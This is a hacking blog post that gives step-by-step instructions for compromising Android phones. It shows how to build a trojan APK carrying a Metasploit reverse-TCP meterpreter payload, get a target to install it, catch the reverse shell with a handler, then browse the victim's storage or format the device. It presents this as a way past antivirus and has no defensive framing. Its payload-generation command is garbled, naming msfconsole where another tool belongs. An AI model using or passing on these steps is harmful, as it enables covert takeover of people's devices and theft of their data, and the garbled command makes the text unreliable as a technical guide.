Hi Friends, Today I am going to teach you how we can compromise an Android Device. Android is becoming much secured and it’s covering all its vulnerabilities. In market there and many Remote Administration Tools available. You came across RATs and how they work, but disadvantage of this tools are they are easily caught by antivirus. Many Antivirus software’s are available for Android device, like 360, Norton etc. So here we are not going to use any Rat, but we are going to make some type of tool which can be compromise the Android.
:: Before Starting ::
We are going to use Kali Linux to create an android app, and one Android Device for Testing. Also we need to update our Metasploit in Kali. Let’s Begin………..
:: Follow the Steps ::
We will start with Kali-Linux.
1} In Kali Linux open two Terminals.
2} In one terminal we will create a Metasploit console by Typing
msfconsole
3} In another Terminal we will make malicious app by the following syntax.
msfconsole android/meterpreter/reverse_tcp lhost=[IP] lport=4444 R > hack.apk
NOTE:
>> lhost will define the system where it will receive the connection after making the app. And you need IP of the Linux machine you are running so for IP use this command in another console
ifconfig
you will get IP in 2nd Line (Inet address:………….) Copy that Ip and paste Just after lhost.
>> R which means exporting the payload in Raw Format next is the Name it can be anything but APK is important because it is the format.
4} So command is there you can create app also you got IP. Now create the malicious App.
:: NOW TESTING THE APP ::
1} Transfer the file to an android device if are on Windows use Bluestacks app Player to install it.
2} Install and Run the app you will get a screen name REVERCE_TCP. Don’t exit the app just keep it in Background. {Internet Connection is Required on Android Device on which u are running the app}
3} Now return to Kali Linux. we opened a Metasploit Console come there.
4} We need access to exploit handler. Type..
use exploit/multi/handler
5} After type exploit so this handler is used to receive connections from external Sources.
When you Run this exploit it’s shows
starting reverse handler
starting Payload.
NOTE:
So already we Installed the app and Opened and kept it in Background. {Internet Connection is Required on Android Device on which u are running the app}.
7} Now you can see that Kali Linux is sending a payload over that app. And waiting for connection. After Few minutes or seconds you can see that meterpreter session is opened.
Once is Session is opened means it’s connected to that Android device successfully now you can exploit it. {HACKED}
In that same terminal. Type
Sysinfo //u will get full information of that device//
Help //to get the rest of all commands that used to exploit//
Cd/ //u can access root dir//
Ls //u can see that dir, filesys, and script//
Cd sdcard // travelling to sd card//
Ls //again access to the file external storage//
Many others command that can used to exploit get them by help command. You can restart the Android device, Format it.
Enjoy….
So, Got idea how Android devices are Compromised. More cool Hacking, Subscribe to RSS.
Follow me On Facebook, Google+, Twitter. Like my Facebook Page.
Hi, I'm Gaurav Thakur. I'm the proud owner of PahadiGeeks. I've interest in tech since childhood. So, I thought to why not share my knowledge with you guys. This gives birth to our blog, PahadiGeeks.com 
0 comments: